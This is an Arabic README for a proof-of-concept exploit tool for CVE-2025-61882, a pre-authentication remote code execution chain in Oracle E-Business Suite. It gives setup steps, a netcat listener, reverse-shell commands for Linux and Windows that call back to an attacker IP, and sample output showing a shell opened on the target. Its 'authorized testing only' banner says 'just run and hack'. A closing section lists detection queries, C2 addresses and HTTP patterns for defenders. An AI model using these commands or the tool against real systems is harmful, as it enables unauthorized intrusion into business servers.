
استغلال لـ CVE-2025-61882، وهو ثغرة RCE حرجة قبل المصادقة في Oracle E-Business Suite. يجمع بين SSRF، وحقن CRLF، وتهريب HTTP، وحقن XSLT لتنفيذ تعليمات برمجية عن بُعد بدون مصادقة.
انظر منشور مدونتنا للتفاصيل الفنية
هذه الأداة مخصصة لاختبار الأمان المصرح به فقط
╔══════════════════════════════════════════════════════════════╗
║ ║
║ 🚨 الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني 🚨 ║
║ ║
║ باستخدام هذه الأداة، فإنك تقر وتوافق على أن: ║
║ ║
║ ║
║ فقط قم بتشغيلها واخترق (FCK THIS JUST RUN AND HACK) ║
║ ║
║ ║
║ ║
║ ║
║ ║
╚══════════════════════════════════════════════════════════════╝
أداة اختبار أمان لـ CVE-2025-61882، وهي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد قبل المصادقة تؤثر على Oracle E-Business Suite.
تم إنشاؤها بواسطة: Mindflare
CVE-2025-61882 هو سلسلة استغلال متطورة تجمع بين خمس ثغرات منفصلة:
/OA_HTML/configurator/UiServletreturn_url/OA_HTML/help/../# استنساخ المستودع
git clone https://github.com/[YOUR-USERNAME]/CVE-2025-61882-POC
cd CVE-2025-61882-POC
# تثبيت التبعيات
pip3 install -r requirements.txt
# جعل السكريبت قابل للتنفيذ (لينكس/ماك)
chmod +x cve-2025-61882-detector.py
في طرفية منفصلة، ابدأ مستمع netcat:
# لينكس/ماك
nc -lvnp 4444
# ويندوز
nc.exe -lvnp 4444
الاستخدام الأساسي (هدف لينكس):
python3 cve-2025-61882-detector.py \
--target http://192.168.1.22:8000 \
--lhost 192.168.1.10 \
--lport 80 \
--command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' \
--platform linux
هدف ويندوز:
python3 cve-2025-61882-detector.py \
--target http://192.168.1.22:8000 \
--lhost 192.168.1.10 \
--lport 80 \
--command 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\"192.168.1.10\",4444)"' \
--platform windows
| المعامل | الوصف | مطلوب | مثال |
|---|---|---|---|
--target | رابط Oracle EBS الهدف | نعم | http://192.168.1.22:8000 |
--lhost | عنوان IP الخاص بك (للاتصالات الراجعة) | نعم | 192.168.1.10 |
--lport | منفذ خادم HTTP (يخدم حمولة XSL) | نعم | 80 أو 8080 |
--command | الأمر المراد تنفيذه على الهدف | نعم | انظر الأمثلة أعلاه |
--platform | نظام تشغيل الهدف: linux أو windows | نعم | linux |
[*] رابط الهدف: http://192.168.1.22:8000
[*] عنوان IP للمستمع: 192.168.1.10
[*] منفذ المستمع: 80
[*] المنصة: linux
[*] بدأ خادم HTTP على 192.168.1.10:80
[*] الاتصال بالهدف لاسترداد رمز CSRF...
[*] رمز CSRF: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] تحضير هيكل تهريب HTTP...
[*] إرسال الحمولة الاستغلالية...
[*] تم إرسال الحمولة الاستغلالية بنجاح
[+] 192.168.1.22 - GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1
[+] تم تقديم حمولة XSL بنجاح
ubuntu@attacker:~$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.22 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
[oracle@apps EBS_domain]$
SELECT * FROM XDO_TEMPLATES_B
WHERE TEMPLATE_CODE LIKE 'TMP%' OR TEMPLATE_CODE LIKE 'DEF%';
مؤشرات الشبكة:
200.107.207.26 (خادم C2 لـ Cl0p)
161.97.99.49 (ثانوي)
أنماط HTTP:
POST /OA_HTML/configurator/UiServletPOST /OA_HTML/SyncServletGET /OA_HTML/help/../*.jspرخصة MIT مع قيود الاستخدام التعليمي - انظر LICENSE
إخلاء مسؤولية: هذا البرنامج مخصص لاختبار الأمان المصرح به فقط. الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام.
**تم إنشاؤها بواسطة:** Mindflare | **آخر تحديث:** أكتوبر 2025